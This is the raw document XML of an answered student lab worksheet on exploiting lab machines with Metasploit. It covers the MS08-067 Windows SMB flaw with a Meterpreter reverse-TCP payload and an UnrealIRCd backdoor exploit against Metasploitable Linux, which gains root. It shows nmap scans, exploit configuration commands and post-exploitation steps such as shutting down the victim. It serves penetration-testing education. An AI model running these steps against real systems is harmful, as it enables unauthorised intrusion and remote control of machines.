    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>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in the command “search platform:windows”.  What is the output?  Were you able to see anything related to the Windows operating system?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>
        <w:tblW w:w="8838.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61">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes, I came across a lot of information about the Windows operating system.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CVE is a dictionary of publicly known information security vulnerabilities and exposures.  Using a browser, open the website </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http://www.cve.mitre.org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then search for information on CVE-2008-4250.  Write down the summary for the CVE information.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>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48"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8748"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">A critical "Server Service Vulnerability" (also known as Gimmiv.A, exploited in October 2008) in multiple Microsoft Windows versions, including Windows 2000 SP4 through Windows 7 Pre-Beta, allows remote attackers to execute arbitrary code via a crafted RPC request that causes a path canonicalization overflow.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
            <w:pPr>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Metasploit console, search for CVE-2008-4250.  Does the CVE exist?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>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48"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8748"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes, the CVE does exist.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
            <w:pPr>
              <w:rPr/>
            </w:pP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 the name of the exploit as listed in the Metasploit search results. Check the information about CVE-2008-4250 in Metasp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserv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oit by typing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info &lt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">copy name of exploit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&gt;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 CVE information from Metasploit the same as the CVE from the CVE website?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>
        <w:tblW w:w="8838.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8"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8838"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="827" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>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Yes, the CVE information from Metasploit matches the information on the CVE website.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
            <w:pPr>
              <w:rPr/>
            </w:pP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Scroll through the exploit information and note down the affected OS and target port that matches the target information from your scanning and footprinting steps.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10"/>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RPORT    445              yes       The SMB service port (TCP)</w:t>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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using an exploit in Metasploit</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Metasploit command prompt on the hacker machine, type in the command below then press enter. This command instructs Metasploit to use a particular exploit.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use &lt;copy exploit name&gt; </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prompt, type in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show payloads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payloads in Metasploit?  List some of the available payloads for the exploit.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table11"/>
        <w:tblW w:w="8838.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7E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">57   payload/windows/meterpreter/reverse_tcp                     .                normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">   58   payload/windows/meterpreter/reverse_tcp_allports            .                normal  No     Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">   59   payload/windows/meterpreter/reverse_tcp_dns                 .                normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">   60   payload/windows/meterpreter/reverse_tcp_uuid                .                normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support</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Look for information for payload “payload/windows/meterpreter/reverse_tcp”.  What does the payload do?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table12"/>
        <w:tblW w:w="8838.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Windows Meterpreter (Reflective Injection), Reverse TCP Stager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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit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provide the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">victim's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 address by typing the command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set RHOST &lt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</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address of victim machine&gt;</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="pr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provide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IP address of the attacker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set LHOST &lt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP</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address of hacker machine&gt;</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the payload for the Meterpreter Reverse TCP by typing in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set PAYLOAD windows/meterpreter/reverse_tcp</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command prompt, type in the command “exploit”.  What does the exploit command do?  Was the exploit able to inject the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter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software?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table13"/>
        <w:tblW w:w="8838.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90">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In the Metasploit Framework, the exploit command launches the configured attack against the target system. It attempts to exploit the specified vulnerability using the chosen payload and target settings (RHOST, LHOST, etc.). Yes, the exploit did successfully inject the Meterpreter payload.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you still in the Metasploit console?  Why?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table14"/>
        <w:tblW w:w="8838.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95">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes, you are still in the Metasploit console because after launching the exploit and successfully injecting the Meterpreter payload, the session transitions into a Meterpreter shell within the same Metasploit environment. You remain in the console to interact with the compromised system, manage sessions, run post-exploitation modules, or initiate other attacks.</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prompt, type in the command “sysinfo”.  Write down the output.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table15"/>
        <w:tblW w:w="8838.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t xml:space="preserve">For other Meterpreter commands, refer to the website http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics.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some of the processes running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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victim machine. Try to search for the correct Meterpreter command to do this</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table16"/>
        <w:tblW w:w="8838.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command prompt</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shutdown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happened to the victim machine?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table17"/>
        <w:tblW w:w="8658.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8"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="8658"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The victim machine shut down.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
            <w:pPr>
              <w:rPr/>
            </w:pP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54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 Gaining Access to Linux</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Attempt to gain access to Metasploitable Linux using Metasploit. Use similar techniques to gather information about the system and check for possible exploits that will work against it. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table18"/>
        <w:tblW w:w="8856.000000000002"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8"/>
        <w:gridCol w:w="3726"/>
        <w:gridCol w:w="2952"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2178"/>
            <w:gridCol w:w="3726"/>
            <w:gridCol w:w="2952"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcP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Information gathered</w:t>
            </w:r>
          </w:p>
        </w:tc>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used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="512"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TCP ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">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PORT     STATE SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">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21/tcp   open  ftp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">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22/tcp   open  ssh</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">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23/tcp   open  telnet</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">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25/tcp   open  smtp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">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80/tcp   open  http</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">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111/tcp  open  rpcbind</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">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139/tcp  open  netbios-ssn</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">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445/tcp  open  microsoft-ds</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">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512/tcp  open  exec</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">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513/tcp  open  login</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">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514/tcp  open  shell</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">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1099/tcp open  rmiregistry</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">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1524/tcp open  ingreslock</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">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2049/tcp open  nfs</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">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2121/tcp open  ccproxy-ftp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">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3306/tcp open  mysql</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">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5432/tcp open  postgresql</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">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5900/tcp open  vnc</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">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6000/tcp open  X11</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">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6667/tcp open  irc</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">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8009/tcp open  ajp13</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">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8180/tcp open  unknown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C9">
            <w:pPr>
              <w:widowControl w:val="1"/>
              <w:spacing w:line="240" w:lineRule="auto"/>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nmap -sT 172.16.15.25</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Operating system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">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Device type: general purpose</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">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Running: Linux 2.6.X</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">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OS CPE: cpe:/o:linux:linux_kernel:2.6</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">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OS details: Linux 2.6.9 - 2.6.33</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">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Uptime guess: 497.102 days (since Wed Mar 20 11:54:42 2024)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">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Distance: 1 hop</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">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TCP Sequence Prediction: Difficulty=202 (Good luck!)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
            <w:pPr>
              <w:widowControl w:val="1"/>
              <w:spacing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IP ID Sequence Generation: All zeros</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
            <w:pPr>
              <w:widowControl w:val="1"/>
              <w:spacing w:line="240" w:lineRule="auto"/>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D4">
            <w:pPr>
              <w:widowControl w:val="1"/>
              <w:spacing w:line="240" w:lineRule="auto"/>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nmap -v -O 172.16.15.25</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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 service detection as part of the enumeration process. Use nmap and look for the option to do service detection on port TCP 6667. What is the name of the software and version running the service on the open port?</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table19"/>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UnrealIRCd</w:t>
            </w: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an exploit that works on the target system by searching the CVE database for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exploits that work against this software with the ability to execute commands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Once results are found, attempt to gain access using the appropriate exploit in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit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the generic/shell_reverse_tcp as your exploit payload.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 that for Linux systems, there will be no prompt displayed even </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if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exploit is successful. Instead, you will have to try executing some shell commands (e.g.</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pwd) to check for a response. </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privilege level or account that gained access to the system?  (Hint: use the whoami command)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table20"/>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root</w:t>
            </w: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exploit used to gain access to the system ?  </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table21"/>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exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
            </w: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2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit Metasploit, Meterpreter and shutting down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Meterpreter command prompt, type in “exit” and press enter.</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Metasploit command prompt, type in “exit” and press enter.</w:t>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Shutdown the hacker virtual machine. Don’t forget to clean up</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1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide Questions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is a CVE entry?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A CVE (Common Vulnerabilities and Exposures) entry is a publicly disclosed cybersecurity vulnerability assigned a unique identifier for standardized tracking and reference.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Briefly discuss the process of how to find an exploit that will likely work against a system following the results from footprinting/scanning/enumeration techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyze system details such as OS, open ports, and running services, then search vulnerability databases (e.g., CVE, Exploit-DB, or Metasploit) for matching known exploits.</w:t>
      </w:r>
    </w:p>
